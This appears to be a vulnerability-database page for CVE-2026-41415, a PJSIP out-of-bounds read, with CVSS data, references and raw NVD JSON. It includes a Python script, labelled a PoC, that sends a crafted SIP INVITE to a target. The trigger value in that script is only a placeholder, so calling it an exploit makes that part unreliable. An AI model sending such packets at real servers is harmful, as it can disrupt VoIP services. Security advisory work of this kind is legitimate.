CVE-2026-41415

Description

PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an out-of-bounds read when parsing a malformed Content-ID URI in SIP multipart message body. Insufficient length validation can cause reads beyond the intended buffer bounds. This vulnerability is fixed in 2.17.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:* - VULNERABLE

PJSIP <= 2.16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-41415 PJSIP Out-of-bounds Read # This script sends a crafted SIP INVITE message with a malformed Content-ID URI. import socket target_ip = "TARGET_IP" target_port = 5060 # Crafted SIP message with multipart/mixed body and malformed Content-ID # The Content-ID header is designed to trigger the parsing flaw. payload = ( "INVITE sip:100@{target_ip} SIP/2.0\r\n" "Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK-12345\r\n" "Max-Forwards: 70\r\n" "To: <sip:100@{target_ip}>\r\n" "From: <sip:[email protected]>;tag=12345\r\n" "Call-ID: [email protected]\r\n" "CSeq: 1 INVITE\r\n" "Contact: <sip:[email protected]>\r\n" "Content-Type: multipart/mixed; boundary=boundary123\r\n" "Content-Length: 200\r\n" "\r\n" "--boundary123\r\n" "Content-Type: application/sdp\r\n" "Content-ID: <[MALFORMED_URI_TRIGGERING_OOB_READ]>\r\n" # Trigger point "\r\n" "v=0\r\no=- 0 0 IN IP4 0.0.0.0\r\ns=-\r\nc=IN IP4 0.0.0.0\r\nt=0 0\r\n" "--boundary123--\r\n" ).format(target_ip=target_ip) try: print(f"[+] Sending PoC to {target_ip}:{target_port}...") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload.encode(), (target_ip, target_port)) print("[+] Payload sent. Check if the target crashes or exhibits behavior.") except Exception as e: print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41415
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41415
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41415/
[4] VulDB https://vuldb.com/cve/CVE-2026-41415
[5] https://github.com/pjsip/pjproject/commit/4225a93c16661538005017883fbc8f1ea1d5f4b0
[6] https://github.com/pjsip/pjproject/security/advisories/GHSA-935m-fmf5-j4pm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41415", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:13.170", "lastModified": "2026-04-28T18:30:54.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an out-of-bounds read when parsing a malformed Content-ID URI in SIP multipart message body. Insufficient length validation can cause reads beyond the intended buffer bounds. This vulnerability is fixed in 2.17."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17", "matchCriteriaId": "3CEC20D0-E450-41AD-BCF9-4E407594F2A7"}]}]}], "references": [{"url": "https://github.com/pjsip/pjproject/commit/4225a93c16661538005017883fbc8f1ea1d5f4b0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pjsip/pjproject/security/advisories/GHSA-935m-fmf5-j4pm", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}